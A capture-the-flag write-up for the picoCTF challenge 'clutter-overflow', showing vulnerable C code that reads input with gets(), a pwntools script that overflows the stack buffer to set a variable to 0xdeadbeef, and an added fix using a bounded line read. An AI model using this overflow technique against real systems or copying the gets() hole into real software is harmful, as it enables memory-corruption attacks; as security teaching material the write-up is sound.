Binary Exploitation
{"authors": ["ret2basic"]}

clutter-overflow

Solved by ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.
nc mars.picoctf.net 31890
chall.c chall

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>

#define SIZE 0x100
#define GOAL 0xdeadbeef
/* The HEADER banner definition is not shown in this listing;
 * empty placeholder so the file compiles. */
#define HEADER ""

int main(void)
{
    long code = 0;
    char clutter[SIZE];

    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);

    puts(HEADER);
    puts("My room is so cluttered...");
    puts("What do you see?");

    /* gets() has no length limit: a line longer than SIZE bytes
     * is written past the end of clutter. */
    gets(clutter);

    if (code == GOAL) {
        printf("code == 0x%llx: how did that happen??\n", GOAL);
        puts("take a flag for your troubles");
        system("cat flag.txt");
    } else {
        printf("code == 0x%llx\n", code);
        printf("code != 0x%llx :(\n", GOAL);
    }

    return 0;
}

Solution

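gets() places no limit on how much it writes into clutter, so a long enough line runs past the end of the buffer. Overwrite the code variable with 0xdeadbeef.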

Exploit

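#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch='amd64', os='linux')
elf = ELF("./chall", checksec=False)

host = 'mars.picoctf.net'
port = 31890

#--------Overwrite variable--------#

# Padding from the start of clutter up to code: 0x110 - 0x8 = 0x108 bytes
offset = 0x110 - 0x8

# flat() packs the integer as a little-endian 8-byte value (amd64 context)
payload = flat(
    b"A" * offset,
    0xdeadbeef,
)

r = remote(host, port)

# Wait for the prompt, then send the payload followed by a newline
r.sendlineafter(b'What do you see?\n', payload)

r.interactive()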
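
Fix

The corrected form of the gets(clutter) call, as an added example that is not part of the challenge or of the original writeup: a bounded line read that rejects over-long input, so nothing beyond clutter is ever written. The struct room layout and the names read_line_bounded and visit_room are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define SIZE 0x100
#define GOAL 0xdeadbeef

/* Assumption for this added demo: a struct pins `code` right after `clutter`
 * (in chall.c the compiler picks the stack layout). */
struct room { char clutter[SIZE]; long code; };

/* Bounded stand-in for gets(): writes at most `size` bytes into buf.
 * Returns line length, -1 on EOF/error, -2 if the line did not fit
 * (the excess is drained so it is not parsed as a later line). */
long read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL) return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return (long)len;
    }
    int c, extra = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        extra = 1;
    return extra ? -2 : (long)len;
}

/* Hypothetical helper: feed n constructed bytes through a temp file, result in *r. */
long visit_room(const void *data, size_t n, struct room *r)
{
    memset(r, 0, sizeof *r);
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    fwrite(data, 1, n, in);
    rewind(in);
    long status = read_line_bounded(in, r->clutter, sizeof r->clutter);
    fclose(in);
    return status;
}

int main(void)
{
    char line[0x110];                 /* constructed over-long input */
    struct room r;
    memset(line, 'A', sizeof line);
    long status = visit_room(line, sizeof line, &r);
    printf("status=%ld code=0x%lx\n", status, (unsigned long)r.code);
    return r.code == (long)GOAL;      /* exit 0: code was not overwritten */
}
```

A caller should treat a return of -2 as an error and discard the truncated contents of clutter rather than act on them.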